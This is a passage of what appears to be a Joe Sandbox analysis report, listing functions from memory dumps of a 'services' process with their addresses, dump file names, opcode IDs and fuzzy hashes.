                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 53fddd6969f9937db9c3217f8121742ce94994a8a5e793a2ebd0dc181d402cf2
                                                                                                                                • Instruction ID: 534c07edbdc65b8cfaad618dc0ccdaf107ab30c8acc85a6ff6c8588568aed85e
                                                                                                                                • Opcode Fuzzy Hash: 53fddd6969f9937db9c3217f8121742ce94994a8a5e793a2ebd0dc181d402cf2
                                                                                                                                • Instruction Fuzzy Hash: E0313B30A1E94ECFEBAADB8C84A55FD77A5FF54300F51007AD01ED22E1DA3A6A409B41
                                                                                                                                Function 00007FFD9BE688F8 Relevance: .1, Instructions: 91COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 14ce9e4240e3dd107a12057b3394567fe4cfa3f82d7022e1031131fc05ddd5aa
                                                                                                                                • Instruction ID: 1e9b107ad5376c01c3e14b564ece454ae06e3ad414c62eb51fc2b1367ba4f8a2
                                                                                                                                • Opcode Fuzzy Hash: 14ce9e4240e3dd107a12057b3394567fe4cfa3f82d7022e1031131fc05ddd5aa
                                                                                                                                • Instruction Fuzzy Hash: 78215C21F0EA8E8FEB689BA858312AC7BE4EF55314F05017BD05DC61E3DD1A69068342
                                                                                                                                Function 00007FFD9BFE7000 Relevance: .1, Instructions: 91COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8aaf837452255fe9fd7c003edc0707953c1ac1778b8ec35d92a490734d3d730c
                                                                                                                                • Instruction ID: 095f93d1fea9a02258334bbd06e6c3ad74623830b83b4968a63fd639083547e5
                                                                                                                                • Opcode Fuzzy Hash: 8aaf837452255fe9fd7c003edc0707953c1ac1778b8ec35d92a490734d3d730c
                                                                                                                                • Instruction Fuzzy Hash: A9318E1071E1EA8EE7398B1C48789707B61EF4230171987BAC1968B4E7C61E7981C341
                                                                                                                                Function 00007FFD9BFE5555 Relevance: .1, Instructions: 90COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8ea074cd384fa565ca365469e4b9645c66c192e7e74717625fc6cab59af76660
                                                                                                                                • Instruction ID: 8a425ba886a0d940384c8d04fd05d93513fa1971caeff0746ab692cebcfd70e6
                                                                                                                                • Opcode Fuzzy Hash: 8ea074cd384fa565ca365469e4b9645c66c192e7e74717625fc6cab59af76660
                                                                                                                                • Instruction Fuzzy Hash: D1212676F1E64E4FE778ABA858321B8B7D2FF54314F0502BAD05EC32E3DE1969018281
                                                                                                                                Function 00007FFD9B7D8A09 Relevance: .1, Instructions: 90COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b9ca902da64beae817e11ddd268205619809000b9cbcff5c230ea1d9ead4c099
                                                                                                                                • Instruction ID: 64919145663ce4841454a6b8c55a37e92b1cc1b06e27163285960d0f080f8b1e
                                                                                                                                • Opcode Fuzzy Hash: b9ca902da64beae817e11ddd268205619809000b9cbcff5c230ea1d9ead4c099
                                                                                                                                • Instruction Fuzzy Hash: 9131B13091978D8FCF55EF68C8556E93BF0FF58304F0502AAE849D72A1DB34AA44CB81
                                                                                                                                Function 00007FFD9BE6A3B0 Relevance: .1, Instructions: 89COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4e1146347fa5d4ea3f718f0f00e6f4e1c3218f2516fd229a675060d91377c599
                                                                                                                                • Instruction ID: d5f2cda5f7889f2e30f22dcb9d57433d0794cc3723cdb340fa8dd03117d36952
                                                                                                                                • Opcode Fuzzy Hash: 4e1146347fa5d4ea3f718f0f00e6f4e1c3218f2516fd229a675060d91377c599
                                                                                                                                • Instruction Fuzzy Hash: 91315E10E1E5EECEE73A83588C785787B55EF51301B195ABAD08ACB0E7D81D79418341
                                                                                                                                Function 00007FFD9B7D76C6 Relevance: .1, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 494fc22b017dcc96d8a0ddc446d4c8f137e96518ea45afe4ef47919e8b84729b
                                                                                                                                • Instruction ID: fe32324b6a19836ae10e8e2a9b6fe870f31ee2abd3859cfff4444336c75e24ba
                                                                                                                                • Opcode Fuzzy Hash: 494fc22b017dcc96d8a0ddc446d4c8f137e96518ea45afe4ef47919e8b84729b
                                                                                                                                • Instruction Fuzzy Hash: 36318E30E0A60D8BEB74DA48C8646ACB7F1FF98350F1107BAD00D922A1CE746A898B41
                                                                                                                                Function 00007FFD9B7A8F2D Relevance: .1, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7ae34db3ba014f9b919f302d71597c985e746896575e7112fba29be21f1f02a2
                                                                                                                                • Instruction ID: d0b78a85958c62daf581801de736e219786b0677c3dbcd567cc15584c7f32aa9
                                                                                                                                • Opcode Fuzzy Hash: 7ae34db3ba014f9b919f302d71597c985e746896575e7112fba29be21f1f02a2
                                                                                                                                • Instruction Fuzzy Hash: 8E21C131A0964D8FDB58DF98D8616ED77F1FF98310F04027AD44AE32A1CA346A15CB81
                                                                                                                                Function 00007FFD9BFEC41B Relevance: .1, Instructions: 84COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8f299570e09ad02cbb3861861c458ad7f0e24a6aacfd4c4fcfabb49c8867dd85
                                                                                                                                • Instruction ID: cc8962630d56768a080b01d4cdc23b5abc33bc6be17a368826258e3e1506f7f7
                                                                                                                                • Opcode Fuzzy Hash: 8f299570e09ad02cbb3861861c458ad7f0e24a6aacfd4c4fcfabb49c8867dd85
                                                                                                                                • Instruction Fuzzy Hash: 6021F33184E68C8FCB65DF64C820AF87BB0EF46300F0501EAE04DC71A2CA396A85CB21
                                                                                                                                Function 00007FFD9BE677B2 Relevance: .1, Instructions: 83COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9de593874a843daf621d9bd5286b5101358bcaeb9d7cd1b42605d068c23913fe
                                                                                                                                • Instruction ID: a5b8396e2155f842e6ccc986254dc82b26a275f3aba4ac95ff15f99602ab61a2
                                                                                                                                • Opcode Fuzzy Hash: 9de593874a843daf621d9bd5286b5101358bcaeb9d7cd1b42605d068c23913fe
                                                                                                                                • Instruction Fuzzy Hash: 7121D431A1991D8FDF98DB58C465AEDB7B1FF68300F0041AED40EE32A1DE35AA81CB40
                                                                                                                                Function 00007FFD9BFEC41A Relevance: .1, Instructions: 83COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bca18a2c38ea0d9dd629c7c87392cc932d47e692fcad3d83dbbf1951141cc907
                                                                                                                                • Instruction ID: 72d4b1543702b1d9c748365a4ade1347fbe656ae2e81518c09bebc77824244d3
                                                                                                                                • Opcode Fuzzy Hash: bca18a2c38ea0d9dd629c7c87392cc932d47e692fcad3d83dbbf1951141cc907
                                                                                                                                • Instruction Fuzzy Hash: 8D21D33194E68C8FDB65DF64C864AF87BB0EF56300F1501EAE04DD71A2CA395A85CB21
                                                                                                                                Function 00007FFD9B790CB9 Relevance: .1, Instructions: 81COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ee7d0cff7c23c59cc1d44fdb0a035243d75d377616240398b44c9a7ba92034aa
                                                                                                                                • Instruction ID: 72fe3dee0f8a7c8ecbae391da4e9dba8ce81d988f1593a78a0edb16bfb8efe9f
                                                                                                                                • Opcode Fuzzy Hash: ee7d0cff7c23c59cc1d44fdb0a035243d75d377616240398b44c9a7ba92034aa
                                                                                                                                • Instruction Fuzzy Hash: 8E21B751B1E75A06E37C557C6C312B47BE1DF86A00F1802BEE49AC22F3ED0CAA0163C0
                                                                                                                                Function 00007FFD9BE60C31 Relevance: .1, Instructions: 80COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 778d8e5cd9719ed3145124eaba0c15d40a7c6da4c040f51dfef8ca8c96f45d34
                                                                                                                                • Instruction ID: 0b5728f0aa958fa8ce1df4b065f1f9585b8f8277ea8e96b199779a8e66df8c95
                                                                                                                                • Opcode Fuzzy Hash: 778d8e5cd9719ed3145124eaba0c15d40a7c6da4c040f51dfef8ca8c96f45d34
                                                                                                                                • Instruction Fuzzy Hash: 4F21AF31F2991E8FDB68DB98C8A19B8B3A1FF85710B05417DC01EC76A2DE25BD12C780
                                                                                                                                Function 00007FFD9B791575 Relevance: .1, Instructions: 80COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f0ba0ba13e71796900fb02da1ebcbf220b96008249a214b7da7fc0632ed6e3e9
                                                                                                                                • Instruction ID: 0d645b98cc7ec5af2c1b0636c8aa10b9a85c22fd8317cf599840e2cedfc3107a
                                                                                                                                • Opcode Fuzzy Hash: f0ba0ba13e71796900fb02da1ebcbf220b96008249a214b7da7fc0632ed6e3e9
                                                                                                                                • Instruction Fuzzy Hash: 28210436B0D39E8BD702AAA8DC211E97B70EF42321F0646B3C564C71D2CB342229C791
                                                                                                                                Function 00007FFD9BFE4449 Relevance: .1, Instructions: 76COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d9e59c09fe35e4684c7bd1d67e1fbfda6e8633df931f18907cce93d708a717c7
                                                                                                                                • Instruction ID: 925c98029b10863a558a48884989e4e331ebc9e7ccc47475bab6c302faa509ec
                                                                                                                                • Opcode Fuzzy Hash: d9e59c09fe35e4684c7bd1d67e1fbfda6e8633df931f18907cce93d708a717c7
                                                                                                                                • Instruction Fuzzy Hash: 91212B31E1A91D9FDBA8DF58C465ABDB7A1EF58310F0101BEE40ED32A1CE35A9408B40
                                                                                                                                Function 00007FFD9BFED1A8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d8bce4e8624e6ac9eb0bcee1b08f54bfc5555a9d17ca9598becb69ed64206279
                                                                                                                                • Instruction ID: b793b406212fb2ddd3046d445da9aea980f37ba86e76467ca6b896ca4b24aa16
                                                                                                                                • Opcode Fuzzy Hash: d8bce4e8624e6ac9eb0bcee1b08f54bfc5555a9d17ca9598becb69ed64206279
                                                                                                                                • Instruction Fuzzy Hash: 0421C531B19A0E9FD718DB98D4619BCB7A1FF45320751427DD00A97AA2DB26B912C780
                                                                                                                                Function 00007FFD9BFE26B4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ce97d49fad5ae52077652d05e467e6e343e3bd5b0154c0e2a61e6baaa42a6605
                                                                                                                                • Instruction ID: e4ddd7fc1bc914d235981b813441db69ec37bfab03f9e7d76796f05dfe298e5e
                                                                                                                                • Opcode Fuzzy Hash: ce97d49fad5ae52077652d05e467e6e343e3bd5b0154c0e2a61e6baaa42a6605
                                                                                                                                • Instruction Fuzzy Hash: 34210E71A0950D8BEBA8DE84C464BF877B2FB99340F14416DD44EE3291DE756A858F00
                                                                                                                                Function 00007FFD9BFEC199 Relevance: .1, Instructions: 72COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2ffc0c63fb0588c64d4923dd2e641ff2ab3fe8f91d485a53014094c8f2a458df
                                                                                                                                • Instruction ID: 9148d281585e050b7f8f14f28af1f01b511acc1e133562bf29119f0308d7ac96
                                                                                                                                • Opcode Fuzzy Hash: 2ffc0c63fb0588c64d4923dd2e641ff2ab3fe8f91d485a53014094c8f2a458df
                                                                                                                                • Instruction Fuzzy Hash: 0A21FA71E1991D9FDB9CDF98D466ABDB7A1EF58310F0101BEE00AD32A1DE39A9418B40
                                                                                                                                Function 00007FFD9BFE8A2D Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3978bf39e5d9dc336b3163f04f68c4f114a8e7ad0747bd45f0d2755eb5e640e8
                                                                                                                                • Instruction ID: 3cbf1c8594f4f452242d2199a7190f7b0ef6b561a57ddb84c6751cf92c6e8782
                                                                                                                                • Opcode Fuzzy Hash: 3978bf39e5d9dc336b3163f04f68c4f114a8e7ad0747bd45f0d2755eb5e640e8
                                                                                                                                • Instruction Fuzzy Hash: 4A112C7260AE8D4FEB54FE5CDCA5AE9B7D1EF59314B0502B9E48DC71E6DD11AC028380
                                                                                                                                Function 00007FFD9B791EBD Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7be7e42d56ce13ae1032767b0530eac671b0a78512dd06b06c554b5a50d4a04f
                                                                                                                                • Instruction ID: 65db71da9b6e18e9121b5dceb4cf428584128ab9c5959ac7083dd3967917f781
                                                                                                                                • Opcode Fuzzy Hash: 7be7e42d56ce13ae1032767b0530eac671b0a78512dd06b06c554b5a50d4a04f
                                                                                                                                • Instruction Fuzzy Hash: 28210C30A1851E9FDB94EFA4C8949ADB3F1FF28341B11067AD409D36A1DF34A955CB40
                                                                                                                                Function 00007FFD9BFE0AF0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: aa905745fc9dbb3ea8f15b3fca7ce80d6e2f169db225b212e6a38382140cbc07
                                                                                                                                • Instruction ID: f8a9689a6f4deda58e8b59ce5a10f72a28261646d73364589b61f4cc44f80f5d
                                                                                                                                • Opcode Fuzzy Hash: aa905745fc9dbb3ea8f15b3fca7ce80d6e2f169db225b212e6a38382140cbc07
                                                                                                                                • Instruction Fuzzy Hash: EB218B3090D7C98FCB42CF6888659E93FF1FF26204B0905DBE489CB1A3C6389959CB51
                                                                                                                                Function 00007FFD9BFE7030 Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b17c0eec3221e48148de003de36c51dff31133b5bcbdd9637f1fa472fd3f9811
                                                                                                                                • Instruction ID: 1e1540f591948240e2b34dea392cce2f1d6899666ada5d9d3e14b250b77a479e
                                                                                                                                • Opcode Fuzzy Hash: b17c0eec3221e48148de003de36c51dff31133b5bcbdd9637f1fa472fd3f9811
                                                                                                                                • Instruction Fuzzy Hash: 2C110D10B2E46F8AFA78CA4C88789B47251FF50301B158779D55B875EACA2EBE80C781
                                                                                                                                Function 00007FFD9BE69460 Relevance: .1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e1ea9e472a287611fd5a4dd034dba52c0041fba56c45f617012b37179862eea4
                                                                                                                                • Instruction ID: 7222fed990b69f8d8dbdfd2bc41e7b73561853da10d4c18be27498cb5d7ffd75
                                                                                                                                • Opcode Fuzzy Hash: e1ea9e472a287611fd5a4dd034dba52c0041fba56c45f617012b37179862eea4
                                                                                                                                • Instruction Fuzzy Hash: 83110821B59E0E8FDB64DB6594A49FD73D1EF54221B40067AD44EC78E2CF29B6068380
                                                                                                                                Function 00007FFD9BFE1A5D Relevance: .1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0e3af81b1e744d6f9cf4b3e5460d9fcd26b32fc4291eec103dc4ba39c78a39e7
                                                                                                                                • Instruction ID: f6d89bc3006cff490c68001d5f51e54fe690d34434f7af6bb9176761bc20642e
                                                                                                                                • Opcode Fuzzy Hash: 0e3af81b1e744d6f9cf4b3e5460d9fcd26b32fc4291eec103dc4ba39c78a39e7
                                                                                                                                • Instruction Fuzzy Hash: DC216F3090E7C98FDB56DF6488645B97FB0EF17210B0901EBD494CB0E3DA39AA58C712
                                                                                                                                Function 00007FFD9BE61810 Relevance: .1, Instructions: 64COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 184d4409292af310194dd25241a4b2e013f20f85820279560ab6afe531bba70b
                                                                                                                                • Instruction ID: fcdaab9eb2e849cc5399c55babeb9e3e5a88647225916d69b6f268e5c7a548e4
                                                                                                                                • Opcode Fuzzy Hash: 184d4409292af310194dd25241a4b2e013f20f85820279560ab6afe531bba70b
                                                                                                                                • Instruction Fuzzy Hash: 70112321B2D94D9FDBA9EB6994659FE7791EF54310B00067AD08EC35E3CE28B7068381
                                                                                                                                Function 00007FFD9BFE53FD Relevance: .1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1a74ecf1241adaa59395045f43b0c4f46ddbc1ef7fa634db54e1b0d93f6e9913
                                                                                                                                • Instruction ID: 6b803d830b3ca87e75f56e92bfa2cf5df35037239de5700c478673ce89001bb9
                                                                                                                                • Opcode Fuzzy Hash: 1a74ecf1241adaa59395045f43b0c4f46ddbc1ef7fa634db54e1b0d93f6e9913
                                                                                                                                • Instruction Fuzzy Hash: 64012473B0AA0D5FEB649988A4652FD7392EF58321F01027BC00AE71A1EE262E4583C1
                                                                                                                                Function 00007FFD9B791588 Relevance: .1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c1fe3a922c7de37c378ffdcfbfb61a6014f5bf4b6ad398f1b5277a01009917e
                                                                                                                                • Instruction ID: a3d1f67f177e8ae42f78f73b09569e3e5cacb0f197209a5ce3912caacb35fe5f
                                                                                                                                • Opcode Fuzzy Hash: 3c1fe3a922c7de37c378ffdcfbfb61a6014f5bf4b6ad398f1b5277a01009917e
                                                                                                                                • Instruction Fuzzy Hash: 2811B235B0D79A8FD702AAA4D8212E97B70EF42321F0546B7D464CB1E6CA346229C791
                                                                                                                                Function 00007FFD9B7B1A65 Relevance: .1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 349061ca95195de3f3d387b34403c75e73e5be4d40710a4912f7c4544a29f37d
                                                                                                                                • Instruction ID: f264e32d909be89f4761c81c428ad9905ab7864e8d51855df4ba5f8430572cfe
                                                                                                                                • Opcode Fuzzy Hash: 349061ca95195de3f3d387b34403c75e73e5be4d40710a4912f7c4544a29f37d
